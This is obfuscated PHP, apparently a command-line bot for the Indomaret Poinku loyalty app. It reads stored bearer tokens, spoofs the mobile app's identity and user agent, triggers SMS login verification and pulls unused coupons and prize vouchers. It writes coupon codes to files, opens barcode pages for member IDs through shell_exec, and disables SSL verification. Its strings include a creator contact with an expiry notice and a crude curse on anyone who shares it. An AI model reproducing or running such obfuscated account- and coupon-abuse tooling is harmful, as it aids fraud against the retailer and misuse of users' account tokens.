  echo shell_exec("\x78\x64\x67\x2d\x6f\x70\145\x6e\x20\x22\x68\164\164\x70\x73\72\57\x2f\142\x61\x72\x63\157\x64\145\x2e\164\x65\x63\55\151\x74\x2e\143\x6f\155\57\x62\x61\x72\x63\157\x64\x65\x2e\141\x73\150\x78\x3f\144\x61\x74\141\75\x22" . $p4iky . "\42\x26\143\x6f\x64\x65\x3d\x43\x6f\x64\145\61\62\x38\46\x6d\x75\154\x74\x69\x70\154\x65\142\141\162\143\x6f\144\145\x73\75\146\141\154\163\x65\46\x74\162\x61\156\x73\154\x61\164\x65\x2d\145\163\x63\75\164\162\165\145\46\x75\156\151\164\75\x46\151\x74\x26\x64\160\x69\75\x39\x36\46\151\x6d\x61\x67\x65\x74\x79\160\145\x3d\x47\151\x66\46\162\157\164\141\x74\151\157\156\75\60\x26\143\x6f\x6c\157\x72\x3d\45\x32\x33\x30\x30\60\x30\60\60\x26\x62\147\x63\x6f\x6c\157\162\x3d\x25\62\x33\146\146\146\146\x66\x66\46\143\157\144\x65\160\141\147\x65\x3d\104\145\x66\141\165\154\x74\x26\161\165\x6e\x69\164\x3d\115\155\x26\161\x75\151\145\x74\x3d\61\x30\46\x68\x69\x64\x65\x68\162\x74\x3d\x46\x61\x6c\163\145\x22");
  goto NqMIz;
  UsRXR:
  echo "\12";
  goto BZCJ6;
  uX1ga:
  P2g53:
  goto Rd6rJ;
  Bqv9L:
  echo @ZM6iC("\x6e\x65\x76\x79", "\x53\x6f\x72\162\171\54\x20\124\150\x69\x73\40\123\x63\162\151\160\x74\x20\x48\141\x73\x20\102\145\x65\x6e\40\122\x65\155\x6f\166\x65\x64\40\x42\171\40\x54\x68\x65\x20\x4f\167\156\145\162\41\x21");
  goto TEHwa;
  a0Fb7:
  if (!($fUekS == '')) {
    goto bHINF;
  }
  goto UNWVG;
  coGDt:
  E2hQ_:
  goto zhwDs;
  CGa35:
  die;
  goto BVsui;
  LppAG:
  echo "\12";
  goto pR3Tn;
  qVcUC:
  echo "\xa";
  goto EOL7D;
  dZ2IE:
  echo @ZM6IC("\x72\145\144", $jTEU0);
  goto IICKu;
  NV5lO:
  $nb9cm = round(microtime(true) * 1000);
  goto mEspx;
  TMRV6:
  echo "\115\x75\154\141\x69\x20\x42\x61\x72\x69\x73\x20\x4b\145\40\x20\x3a\x20";
  goto KF17u;
  yVAZE:
  $earOL = "\x31\x31\62\x32\63\63";
  goto sQzl_;
  QVao_:
  echo @zM6IC("\162\145\x64", "\xa\176\176\176\x7e\x7e\x7e\x7e\x7e\x7e\176\176\x7e\x7e\x7e\176\x7e\176\x7e\x7e\x7e\x7e\x7e\x7e\x7e\176\x7e\176\176\x7e\x7e\176\176\x7e\176\176\x7e\176\176\x7e\x7e\x7e\x7e\x7e\176\x7e\176\x7e\176\12");
  goto Vn1b5;
  vG0Az:
  echo @zM6ic("\x6e\145\166\x79", "\40\x20\40\x20\x20\x20\40\40\x20\40\x59\x41\x4e\x47\x20\116\x59\105\x42\101\122\111\x4e\x20\x53\x43\122\x49\x50\x54\x20\x49\x4e\x49\x20\xa");
  goto VvpIh;
  C4GzD:
  $K4tCB = @$owfHy["\144\x61\164\x61"][$dQ8Tp]["\160\x72\157\166\151\x6e\143\x65\116\x61\x6d\145"];
  goto c3hCT;
  s74NK:
  echo "\xa";
  goto PGbXK;
  PP6AJ:
  echo "\12";
  goto Yz7jy;
  KT5E1:
  echo @Zm6ic("\162\145\144", "\12\x7e\x7e\x7e\176\176\x7e\x7e\176\x7e\x7e\x7e\x7e\x7e\176\176\x7e\x7e\x7e\176\x7e\x7e\176\176\x7e\x7e\176\x7e\x7e\176\176\176\176\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\x7e\176\176\176\176\x7e\x7e\xa");
  goto UwOU9;
  JaM1M:
  echo "\12";
  goto wagK0;
  JjOHD:
  $zvt88 = $QRhbE;
  goto Rdfo1;
  MB1KJ:
  $VW123 = @$lImQC["\x64\x61\164\x61"]["\x63\x6f\x6e\164\145\x6e\164"][0]["\x63\x6f\x75\160\157\x6e\x4e\141\x6d\145"];
  goto kHzhX;
  tX5nR:
  echo "\x53\x61\x6d\160\x61\x69\x20\x42\x61\x72\x69\163\40\113\x65\40\x3a\40";
  goto LP87k;
  tMRFs:
  echo @ZM6Ic("\x6e\x65\x76\171", "\x41\x70\141\153\141\x68\x20\123\165\x64\141\x68\40\x54\162\x61\156\x73\x61\153\x73\x69\40\x3f\40\x28\40\x79\x20\x2f\40\156\x20\x29\40\x3a\x20");
  goto Mk08D;
  iu_7C:
  echo "\12\xa";
  goto tMRFs;
  QdmIB:
  echo "\xa";
  goto LatCK;
  trai8:
  $jTEU0 = trim(fgets(STDIN));
  goto xZwF2;
  ZbpF6:
  echo @zm6Ic("\x6e\x65\x76\171", "\40\x20\x20\x20\x20\x20\40\40\x20\x20\131\x41\116\107\40\116\x59\x45\x42\101\x52\111\x4e\x20\x53\x43\122\x49\x50\124\x20\111\116\111\x20\12");
  goto qvHnx;
  VvpIh:
  echo @Zm6IC("\x6e\145\166\x79", "\40\123\x45\x4d\x4f\x47\101\40\x4c\x4f\x42\x41\116\107\40\x50\x41\x4e\124\101\x54\x20\116\x59\x41\40\102\111\x53\125\x4c\101\x4e\41\41\41\x21\41\x20\xa");
  goto g3Opg;
  kJzNF:
  $p4iky = @$Ap1KM["\x64\x61\x74\x61"]["\155\145\x6d\142\145\x72\111\x64"];
  goto jGI0Q;
  K3Ngh:
  $BW_8H = @$cQFRW["\x64\141\x74\x61"]["\x64\x65\163\143\x72\x69\160\x74\x69\x6f\156"];
  goto MlxLs;
  Yz7jy:
  echo @ZM6Ic("\147\162\x65\145\156", "\101\x6b\x75\156\x20\113\x65\40\x3a\40");
  goto dZ2IE;
  d802g:
  $owfHy = json_decode($upOL9, true);
  goto cfUiS;
  aRKHO:
  goto qve7i;
  goto vir3g;
  ERz4c:
  echo "\12";
  goto Y2z6Q;
  jm25w:
  echo @ZM6iC("\171\x65\x6c\154\157\x77", "\116\141\x6d\x61\40\113\x75\x70\x6f\x6e\x6e\x79\x61\40\x20\40\x20\x3a\x20");
  goto fe9xE;
  WBD6A:
  $L9Nzh = @$lImQC["\x64\141\164\x61"]["\x63\157\x6e\x74\x65\x6e\x74"][9]["\143\157\165\x70\x6f\156\103\157\144\x65"];
  goto yz1R8;
  u7stb:
  echo @zM6Ic("\147\162\145\145\x6e", $wd9cN);
  goto qp4VT;
  UiL6h:
  Oer0B:
  goto UuPe7;
  qybIO:
  $m0f8X = explode("\xa", @file_get_contents("\155\x79\164\x6f\153\x65\156"));
  goto NKzpF;
  fTiXw:
  $ABmxY = @$H1g60["\x6d\x65\163\163\141\147\145"];
  goto K0Bqd;
  lNj3J:
  $BcbF3 = @$Ap1KM["\144\141\x74\x61"]["\160\150\x6f\x6e\x65\116\165\155\142\145\162"];
  goto Nwht5;
  Lqpb5:
  $upOL9 = G8Pf2("\x68\164\x74\160\x73\72\57\x2f\145\x64\164\163\141\160\x70\56\151\x6e\144\157\x6d\x61\162\x65\x74\x70\157\151\x6e\153\x75\56\x63\157\155\57\x67\x61\x6d\x65\57\x61\160\151\170\55\61\65\x30\x32\x2d\x61\x70\151\x2f\x63\165\x73\x74\x6f\x6d\145\x72\55\147\141\x6d\x65\57\x67\145\x74\55\165\x6e\x75\x73\145\x64", $aY0el, $GOXkU, $mlMLt);
  goto XuMwA;
  hrbe8:
  $jT2Pf = @$owfHy["\144\x61\164\141"]["\143\x6f\156\164\x65\x6e\164"][$fM3_G]["\x63\x6f\x75\160\x6f\x6e\115\141\x73\x74\145\x72\111\x64"];
  goto HOz1w;
  EZ2g0:
  $AxbWA = XWl4L();
  goto NPalc;
  kMeiR:
  shell_exec("\163\x74\141\162\x74\40\x63\150\162\x6f\x6d\145\x20\x22\x68\164\x74\160\163\x3a\x2f\57\x62\141\162\143\x6f\x64\x65\x2e\164\x65\143\55\151\x74\56\143\157\155\x2f\x62\141\162\143\157\144\145\x2e\x61\x73\x68\170\x3f\144\141\164\x61\75\42" . $WtCiL . "\x22\46\143\x6f\144\x65\75\103\157\144\145\x31\62\70\x26\x6d\x75\x6c\164\x69\x70\x6c\145\142\x61\x72\x63\157\x64\145\x73\75\146\141\x6c\163\x65\46\164\162\x61\156\163\x6c\141\164\x65\x2d\145\163\x63\x3d\164\162\x75\145\46\x75\x6e\x69\164\75\x46\x69\164\46\144\x70\151\75\x39\x36\x26\151\x6d\x61\147\x65\x74\x79\160\145\75\107\x69\x66\46\162\x6f\x74\x61\164\151\x6f\156\x3d\x30\46\143\157\154\x6f\162\x3d\x25\62\x33\60\x30\x30\x30\60\x30\46\x62\x67\143\157\154\x6f\x72\x3d\x25\x32\x33\146\x66\x66\x66\x66\x66\46\143\157\x64\145\x70\x61\147\x65\x3d\104\x65\x66\141\x75\154\x74\x26\x71\x75\156\151\x74\75\115\x6d\46\x71\165\x69\x65\164\75\x31\60\x26\x68\151\144\x65\x68\162\164\x3d\106\141\154\x73\145\42");
  goto Qgse8;
  fuGBB:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto ZAUQ0;
  pVd1W:
  @unlink("\160\x6f\x69\156\150\160\x2e\160\x68\160");
  goto PUv3V;
  vwrtA:
  echo "\xa";
  goto Xl42B;
  p3S5N:
  echo @ZM6IC("\156\145\x76\x79", "\123\157\x72\x72\x79\54\40\x54\150\151\x73\40\123\143\162\x69\160\164\40\x48\141\x73\40\102\x65\x65\156\40\122\145\155\157\x76\145\144\x20\102\x79\x20\x54\150\145\x20\x4f\x77\x6e\145\x72\41\x21");
  goto LGOHq;
  FS_4m:
  echo @ZM6IC("\156\145\166\171", "\40\x7c\40\x53\x63\162\151\160\x74\x20\111\104\115\x20\x43\145\153\x20\x50\x6f\x69\x6e\xa");
  goto lhi8z;
  TNEVB:
  $nb9cm = round(microtime(true) * 1000);
  goto u_8of;
  AJX59:
  $aoIfK = @file_get_contents("\57\x73\164\157\162\141\x67\145\x2f\x65\155\x75\154\x61\x74\145\144\x2f\60\57\x41\156\144\x72\x6f\x69\144\x2f\x79\x6f\165\x72");
  goto o4b0D;
  yncKT:
  $YUfPv = @$owfHy["\x64\x61\x74\x61"][0]["\x61\144\x64\162\145\x73\x73"];
  goto ZAvo0;
  SrfgL:
  echo "\xa";
  goto FNHI1;
  oTnn7:
  echo "\x45\162\162\157\x72\x20\x64\x65\154\x65\164\151\x6e\147\40{$xp_1p}\40\40";
  goto NlZns;
  QQ1jd:
  echo "\xa";
  goto twQoz;
  ZDI74:
  goto CjBGa;
  goto lZyiz;
  lfA_D:
  echo @Zm6IC("\x67\x72\x65\x65\156", "\x4e\157\155\x6f\162\x20\110\x50\x20\101\x6e\144\141\40\40\x3a\40");
  goto wxlya;
  x8RGk:
  echo @ZM6ic("\x6e\x65\x76\171", $XDyMm);
  goto PprMi;
  y6y7W:
  $sOOnY = Fq6w0();
  goto YS1xZ;
  GIkxB:
  echo "\xa";
  goto Y7JQT;
  VNXZA:
  echo @ZM6IC("\x6e\x65\166\171", "\101\153\165\156\x20\x4b\x65\40\x20\x20\40\40\x20\x20\x20\72\x20");
  goto mJNk_;
  b8f1e:
  echo @ZM6IC("\x79\x65\x6c\x6c\157\x77", "\123\x43\101\x4e\40\x42\x41\122\x43\117\x44\105\x20\111\116\x49\x20\x41\107\101\122\x20\113\x41\123\x49\122\x20\114\105\102\111\x48\40\x4d\x55\104\x41\110\x2e\x2e");
  goto Ym8cq;
  y0e5f:
  xh261:
  goto v0lAt;
  qhJ96:
  $obc_G = str_replace("\15", '', $wlJRC);
  goto wjnbp;
  LevEA:
  $U0YgX = str_replace("\15", '', $zcN5u);
  goto TXD0c;
  TfHzm:
  $yy9BI++;
  goto kC88F;
  wb_0Q:
  echo "\xa";
  goto Wn0sH;
  eOGWf:
  echo @Zm6Ic("\162\x65\x64", "\xa\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\176\x7e\176\x7e\176\x7e\x7e\176\x7e\176\x7e\176\176\x7e\176\176\x7e\176\176\176\x7e\176\176\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\x7e\176\176\176\176\176\176\12");
  goto JED86;
  jVUfe:
  echo @zM6ic("\x67\162\x65\x65\x6e", $wd9cN);
  goto FS_4m;
  DYYUw:
  r1qlS("\x62\x65\x61\164", $qaGLY);
  goto q9uvU;
  APlFW:
  if (!($zcN5u == '')) {
    goto EBuCw;
  }
  goto ChAnZ;
  J4PSC:
  shell_exec("\x73\x74\x61\x72\x74\40\143\150\162\157\155\x65\40\42\150\164\164\160\163\x3a\57\x2f\142\141\x72\143\157\144\145\x2e\x74\x65\x63\55\151\x74\56\x63\x6f\155\57\x62\x61\162\143\157\x64\x65\56\141\x73\150\x78\77\144\x61\x74\141\75\x22" . $p4iky . "\x22\46\143\x6f\144\x65\x3d\x43\x6f\x64\145\x31\x32\70\46\x6d\165\x6c\164\151\x70\x6c\145\x62\141\162\x63\157\144\x65\x73\75\x66\x61\x6c\163\x65\46\x74\x72\x61\156\163\154\141\x74\x65\x2d\145\x73\x63\75\x74\x72\x75\145\x26\165\156\x69\164\x3d\x46\x69\x74\46\144\160\151\75\71\66\46\x69\x6d\x61\x67\145\x74\x79\x70\145\x3d\x47\151\x66\46\x72\157\x74\141\x74\151\157\156\x3d\x30\x26\143\157\x6c\x6f\x72\75\x25\62\x33\60\60\x30\60\x30\x30\x26\142\x67\x63\x6f\x6c\x6f\x72\75\45\x32\63\146\x66\x66\x66\146\x66\46\143\x6f\144\145\x70\x61\147\x65\75\104\145\146\141\x75\x6c\164\x26\161\165\156\x69\164\75\x4d\x6d\x26\161\165\151\145\x74\75\61\60\46\x68\x69\x64\145\x68\x72\164\x3d\106\x61\154\163\145\42");
  goto l7_E_;
  rn8GJ:
  $C2XmN = trim(fgets(STDIN));
  goto zVEB0;
  cd3Bo:
  $xT15V = g8Pf2("\x68\164\164\160\x73\x3a\x2f\57\145\144\164\x73\x61\x70\x70\56\x69\x6e\144\x6f\x6d\141\x72\x65\164\160\x6f\151\156\153\165\56\143\157\155\x2f\45\x32\106\154\x6f\171\x61\x6c\164\171\x25\62\106\141\160\x69\170\x2d\61\65\60\62\x2d\x61\x70\151\45\62\106\155\157\x62\151\x6c\145\45\x32\x46\143\157\x69\156\163\x25\x32\106\160\162\x69\x7a\145\x73\45\62\106\x47\117\106\122\105\x53\110\62\x30\62\x32\45\62\106\155\x65", $aY0el, $GOXkU, $mlMLt);
  goto sw1Yf;
  R6OFx:
  echo "\12";
  goto FEDRd;
  y23qq:
  echo @ZM6iC("\171\145\x6c\x6c\157\167", "\x20\x53\x45\115\x4f\107\101\40\x4c\x4f\102\101\x4e\x47\40\120\x41\116\x54\x41\x54\x20\x4e\131\x41\x20\102\x49\123\x55\114\101\x4e\x21\x21\41\41\x21\40\12");
  goto lpuTf;
  hesKw:
  echo "\xa";
  goto EyI4f;
  Cq7zJ:
  echo @Zm6iC("\162\145\144", "\12\x7e\176\176\176\x7e\176\x7e\x7e\x7e\176\x7e\x7e\x7e\x7e\x7e\x7e\176\176\x7e\176\x7e\176\176\x7e\x7e\176\176\x7e\x7e\x7e\176\176\176\176\176\176\x7e\x7e\176\x7e\176\176\x7e\176\176\176\176\x7e\xa");
  goto tB3wy;
  JbcL1:
  sleep(2);
  goto Y_tV5;
  MdYDc:
  echo @Zm6iC("\156\145\x76\x79", $XDyMm);
  goto JbcL1;
  zpxt2:
  echo @ZM6Ic("\x6e\145\x76\171", $ABmxY);
  goto hwskv;
  jbrcC:
  echo @ZM6iC("\156\x65\x76\x79", $l9PIA);
  goto YZCxr;
  hrgrJ:
  $QRhbE = explode("\12", @file_get_contents("\155\171\164\157\x6b\x65\x6e"));
  goto ZiZaH;
  jGI0Q:
  $BcbF3 = @$Ap1KM["\144\x61\x74\x61"]["\160\150\157\156\x65\x4e\x75\x6d\x62\x65\162"];
  goto GzPT0;
  PdwRl:
  if (!($WtCiL == '')) {
    goto GViaE;
  }
  goto aPAP6;
  qb0N_:
  XUxU1:
  goto xa14b;
  gH9aH:
  aaoBE:
  goto zLIQ0;
  rvW4D:
  echo "\xa";
  goto cERjc;
  HFyvl:
  echo "\12";
  goto ipjRN;
  zFVeV:
  sleep(3);
  goto E8UsH;
  ndPeW:
  echo "\xa";
  goto zB761;
  eGQqo:
  print_r($zcN5u);
  goto bbqtH;
  gmo6i:
  $jTEU0 = trim(fgets(STDIN));
  goto p6gIA;
  w8Oba:
  echo @zm6iC("\x6e\x65\x76\171", $M1ADy);
  goto wmFCH;
  HBGqV:
  echo "\12";
  goto dg8Ba;
  iGFo4:
  echo @ZM6IC("\x72\x65\144", "\116\117\x54\x49\103\105\x20\x21\41\40\x3a\40\12");
  goto g8W5n;
  IqjPI:
  $zV17j = @$lImQC["\x64\141\164\141"]["\x63\x6f\156\x74\x65\x6e\164"][8]["\x63\x6f\x75\x70\157\x6e\x43\x6f\144\x65"];
  goto hCiCJ;
  BKuVN:
  echo "\xa";
  goto OGVYy;
  Ncv3v:
  echo "\xa";
  goto RGbnB;
  dSUW6:
  $tqWr2 = $zvt88[$yy9BI];
  goto rFpmU;
  trl7f:
  echo "\xa";
  goto nkBu3;
  x6_r_:
  echo @Zm6IC("\171\145\x6c\x6c\x6f\167", "\174\40\x57\x41\40\x30\x38\x32\x31\67\x36\x33\x35\x38\62\71\x35\40\12");
  goto CSX6x;
  mu6vT:
  $DNueE = trim(fgets(STDIN));
  goto NsEvq;
  HjmuJ:
  echo @zM6Ic("\x67\162\145\x65\x6e", "\116\157\x6d\x6f\x72\x20\110\120\40\101\x6e\x64\x61\x20\40\x3a\x20");
  goto Na7VL;
  ZMAxB:
  $ZXjwY = @$owfHy["\x64\141\164\141"]["\143\157\x6e\x74\145\x6e\x74"][$dQ8Tp]["\156\141\155\x65"];
  goto uB3zb;
  ahhi3:
  $fM3_G;
  goto WL3hT;
  Y4Lal:
  $tqWr2 = $zvt88[$yy9BI];
  goto VYfqN;
  aLrHz:
  echo @zM6Ic("\160\165\x72\160\154\145", "\176\176\176\x7e\x7e\176\x7e\x7e\176\x7e\176\x7e\x7e\176\x7e\176\x7e\x7e\x7e\176\176\x7e\x7e\176\176\176\176\x7e\x7e\176\176\x7e\176\176\176\x7e\176\x7e\x7e\x7e\176\176\x7e\x7e\176\x7e\176\x7e\12");
  goto Ww5hz;
  zqUTx:
  $kGhP3 = @$lImQC["\x64\x61\x74\x61"]["\x63\157\x6e\x74\x65\156\x74"][15]["\143\157\165\160\157\156\103\x6f\x64\145"];
  goto XpHuc;
  eeolX:
  $efQM2 = count($QRhbE) - 1;
  goto CLkg8;
  Hmjxw:
  echo "\12";
  goto e1vCg;
  cQZFg:
  echo @Zm6iC("\156\x65\x76\171", $yJiD4);
  goto TfY0U;
  uu2gK:
  $p4iky = @$Ap1KM["\x64\x61\x74\141"]["\x6d\145\x6d\x62\x65\162\x49\x64"];
  goto MTsVB;
  l_o2B:
  echo "\xa";
  goto SAvQe;
  mWmUQ:
  echo @zM6iC("\147\162\145\145\156", $wd9cN);
  goto T1pw_;
  CLkg8:
  $zvt88 = $QRhbE;
  goto Y4Lal;
  D7qnE:
  $aY0el = $v1ZMX;
  goto JpUFi;
  B9JFh:
  $wDisp = "\x7b\42\141\x70\x70\x49\156\x73\x74\x61\156\143\x65\111\x64\42\x3a\42" . $WYrgv . "\42\54\x22\x61\160\160\126\145\162\163\x69\x6f\156\42\x3a\42\x33\x2e\61\63\56\x30\42\x2c\42\x63\157\165\x6e\x74\162\x79\103\x6f\x64\x65\42\72\x22\x49\104\42\x2c\42\x61\x6e\141\154\171\x74\151\143\163\125\163\x65\x72\120\162\x6f\x70\x65\x72\164\x69\x65\x73\x22\x3a\x7b\175\x2c\x22\141\160\x70\x49\x64\42\72\42\x31\x3a\x39\x39\x38\70\x31\66\x36\60\x35\x33\x32\70\72\141\156\x64\162\157\151\144\72" . $aY0el . "\42\54\x22\x70\x6c\141\164\x66\x6f\x72\155\126\145\162\x73\151\x6f\156\42\x3a\x22\x32\70\42\x2c\42\x74\x69\155\145\x5a\157\x6e\145\x22\72\42\x41\x73\151\x61\x5c\x2f\112\141\153\141\162\164\141\x22\54\x22\x73\144\153\x56\x65\162\x73\151\157\x6e\42\x3a\42\x32\61\x2e\60\56\x31\x22\54\x22\x70\141\143\153\141\147\x65\116\x61\x6d\x65\42\72\x22\x6d\x79\x70\157\x69\x6e\x2e\151\x6e\144\x6f\155\x61\x72\145\x74\x2e\x61\156\x64\x72\157\x69\x64\42\x2c\x22\141\x70\160\x49\156\163\164\141\156\143\145\111\x64\124\x6f\153\x65\x6e\x22\x3a\x22" . $YYbml . "\x22\54\x22\154\141\x6e\147\x75\141\x67\x65\x43\x6f\x64\x65\42\72\x22\x69\x64\x2d\111\104\x22\x2c\42\141\x70\x70\x42\165\151\154\144\x22\72\x22\61\60\64\42\175";
  goto EmOI6;
  jcyDG:
  if (!($zcN5u == '')) {
    goto ObwZf;
  }
  goto H8iZh;
  KesBR:
  goto thh3I;
  goto GShuM;
  Ysu6A:
  $M1ADy = @$Ap1KM["\x64\x61\x74\141"]["\151\144"];
  goto kJzNF;
  Q5jat:
  die;
  goto FI_gp;
  GHKYD:
  echo @zm6IC("\147\x72\145\145\x6e", "\x53\164\x61\164\165\163\x20\x3a\x20");
  goto bAz0x;
  jfJh8:
  $wDisp = "\x7b\42\x66\151\x64\x22\72\42" . $odGGi . "\x22\x2c\42\141\x70\160\111\x64\42\x3a\42\x31\72\x39\x39\x38\70\61\66\x36\x30\x35\x33\x32\70\x3a\x61\156\144\162\x6f\x69\x64\72" . $aY0el . "\42\54\x22\x61\x75\164\150\x56\145\x72\x73\x69\157\x6e\42\72\x22\106\x49\x53\137\166\62\42\x2c\42\x73\144\153\126\x65\162\x73\x69\157\156\42\x3a\x22\x61\x3a\x31\67\56\x30\x2e\60\x22\175";
  goto gsqDa;
  seLWO:
  echo "\xa";
  goto A2BXs;
  Hd85v:
  echo @zM6iC("\171\x65\154\x6c\x6f\167", "\116\x61\x6d\x61\40\102\151\152\x69\x20\72\40");
  goto jbrcC;
  C9UeF:
  $ABmxY = @$H1g60["\155\145\163\x73\141\x67\145"];
  goto QCDzE;
  Mjz7D:
  die;
  goto tndI6;
  F_jim:
  echo "\12";
  goto hrq_b;
  Ao7nr:
  $nb9cm = round(microtime(true) * 1000);
  goto zZPco;
  vsZvq:
  echo @ZM6ic("\156\145\x76\171", "\123\157\162\x72\x79\x2c\x20\x54\x68\x69\x73\x20\x53\x63\162\x69\160\164\40\110\141\x73\40\x42\x65\145\156\x20\x52\145\155\157\x76\x65\x64\x20\102\171\x20\x54\x68\x65\40\x4f\x77\156\x65\x72\x21\x21");
  goto amjZI;
  UKSbZ:
  echo "\xa";
  goto q16je;
  FHmCL:
  goto SjMQr;
  goto Zs3mW;
  N_rB_:
  goto Eqo5q;
  goto SlPSt;
  u7PIe:
  echo "\xa";
  goto d28r0;
  nzGg7:
  echo "\xa";
  goto C826k;
  ECJHz:
  $yy9BI = "\x30";
  goto NUXI3;
  qkMR4:
  Fcnek:
  goto WH0T2;
  NcYE1:
  RHRij("\113\165\x70\157\x6e\x20\x50\157\151\x6e\x6b\165\40\x6e\145\x77\x2e\164\x78\164", $Uzp_O);
  goto BQUXh;
  cOqby:
  echo @ZM6Ic("\156\x65\x76\x79", "\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\x41\x41\115\111\111\116\40");
  goto KuMZj;
  Crsbt:
  echo @Zm6ic("\156\145\x76\x79", $Fm5gC);
  goto eMkRf;
  z1iAX:
  echo @ZM6ic("\x6e\x65\x76\x79", "\x20\123\x45\x4d\x4f\107\101\x20\x4c\x4f\102\101\116\107\40\x50\101\x4e\x54\x41\x54\x20\116\131\101\x20\102\x49\x53\125\x4c\101\116\41\41\41\41\x21\40\xa");
  goto u3Vxh;
  Nc01k:
  $sOOnY = fQ6w0();
  goto yoo1d;
  t6k9h:
  die;
  goto licpJ;
  nWNE3:
  echo "\12";
  goto jGAxT;
  iB1bd:
  echo "\xa";
  goto QiKp7;
  FEDRd:
  jXMk8:
  goto Zi5Xi;
  gT7PW:
  print_r($Jk9cx);
  goto vmL3U;
  MBfiO:
  $yy9BI = "\60";
  goto YBxi2;
  nkBu3:
  echo @zM6Ic("\x79\x65\154\x6c\x6f\x77", "\116\141\155\x61\x20\113\x61\142\x75\x70\141\x74\145\156\x20\40\x3a\40");
  goto Mz5t0;
  sJbH0:
  MmeTG:
  goto EUpE7;
  yrt42:
  echo @ZM6ic("\x79\145\x6c\154\157\x77", "\123\x74\x61\164\165\163\40\120\x65\x63\x61\x68\x69\156\40\101\171\141\x6d\x20\x3a\x20");
  goto evgdx;
  Ret60:
  if ($r99Ty >= $Z3FW0) {
    goto KthQF;
  }
  goto p4Gny;
  VLriK:
  echo @zm6IC("\156\x65\166\x79", "\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\40\x20\x20\x41\101\115\111\x49\x4e\40");
  goto Lbb3x;
  PUFOJ:
  echo "\12";
  goto MHKcM;
  vLml6:
  date_default_timezone_set("\101\x73\151\141\57\x4a\141\153\x61\x72\x74\141");
  goto Cm2vU;
  XIrU2:
  dlkR6:
  goto lVk3T;
  SVzVu:
  die;
  goto JDhRT;
  s8LZ0:
  echo @zM6Ic("\162\x65\x64", $YXsOG);
  goto RhKbU;
  yCk2k:
  echo @ZM6iC("\x79\x65\154\x6c\x6f\x77", "\x4e\x61\x6d\141\x20\x4b\x75\x70\157\156\x6e\171\141\x20\x20\40\x20\x20\40\40\x3a\x20");
  goto WQ2iB;
  UXRYi:
  echo "\xa";
  goto aZIpz;
  Hw18y:
  $o0WQD = thhfs("\x68\x74\x74\x70\163\x3a\57\x2f\x65\144\164\x73\141\x70\x70\56\151\156\x64\157\x6d\141\162\145\164\x70\157\151\156\153\x75\56\143\157\155\x2f\x6c\x6f\147\x69\156\57\141\160\x69\170\55\x31\x35\60\x32\x2d\x61\160\x69\x2f\x6f\160\145\x6e\x2f\x6c\157\147\x69\156\x2d\x76\145\162\151\146\151\x63\x61\x74\x69\x6f\156\55\x73\x6d\x73", $wDisp, $aY0el, $GOXkU);
  goto QERDp;
  Stqqe:
  if (!($fUekS == '')) {
    goto EIaaQ;
  }
  goto jYGp4;
  V8mM_:
  goto Pn_38;
  goto uo5Zq;
  eefzo:
  echo @zm6Ic("\x72\x65\x64", "\123\143\162\151\160\x74\40\x45\170\160\x69\162\145\x64\54\40\x48\165\x62\165\156\x67\151\x20\103\x72\145\141\164\x6f\162\40\150\164\164\160\163\x3a\x2f\57\167\141\56\155\145\x2f\x36\62\70\62\61\x37\66\x33\65\x38\x32\71\65\xa");
  goto tuakP;
  kXusB:
  $kkTa0 = @$lImQC["\x64\x61\164\141"]["\x63\157\x6e\164\x65\156\x74"][8]["\x63\x6f\165\x70\x6f\156\116\141\x6d\145"];
  goto IqjPI;
  x3nD5:
  $S8W9D = trim(fgets(STDIN));
  goto Ytgsb;
  BH7Bk:
  @unlink("\x70\x6f\x69\x6e\x68\160\x2e\x70\x68\160");
  goto BgRSC;
  vGFvF:
  if ($mF_0D == "\104\x69\x73\x6b\157\156\x20\x52\160\40\62\65\x2e\60\x30\x30\40\x4b\154\x69\153\x20\111\156\144\x6f\155\x61\x72\x65\x74") {
    goto E34nz;
  }
  goto CVCdX;
  t4WY0:
  function SN4Vo($lEbop, $Uar3a)
  {
    goto Sf63t;
    r0PO3:
    $AXlcQ = json_decode($y7f11, true);
    goto rqGky;
    mx4Uj:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto e6CFv;
    cr0Bt:
    return false;
    goto fOIj4;
    MtxRw:
    $P7lm9 = curl_getinfo($C6npe);
    goto giq61;
    d2mok:
    sk06s:
    goto cr0Bt;
    R9JZf:
    return $ECuqv;
    goto kLG6F;
    kRHBB:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto ddExm;
    gQAbh:
    $ruc3h[] = "\141\165\164\150\157\x72\x69\172\141\164\x69\x6f\156\x3a\x20\x42\x65\x61\x72\145\162\40" . $Uar3a;
    goto mx4Uj;
    xG1DX:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto DePwW;
    ha2Mf:
    $ECuqv = curl_exec($C6npe);
    goto MtxRw;
    Sf63t:
    $C6npe = curl_init();
    goto P5x1k;
    rqGky:
    print_r($AXlcQ);
    goto R9JZf;
    giq61:
    if (!$P7lm9) {
      goto sk06s;
    }
    goto oprV8;
    OQd73:
    goto ebIZt;
    goto d2mok;
    e6CFv:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto kRHBB;
    ddExm:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\156\144\157\56\x74\x78\x74");
    goto Ay05N;
    P5x1k:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto xG1DX;
    P8vqE:
    $ruc3h[] = "\x75\163\x65\162\55\x61\147\x65\156\164\72\x20\x6f\x6b\150\164\164\x70\x2f\64\x2e\x39\x2e\60";
    goto gQAbh;
    Ay05N:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\x6e\x64\x6f\56\x74\x78\164");
    goto ha2Mf;
    PkO5C:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto OQd73;
    fOIj4:
    ebIZt:
    goto r0PO3;
    DePwW:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto P8vqE;
    oprV8:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto PkO5C;
    kLG6F:
  }
  goto EbIaF;
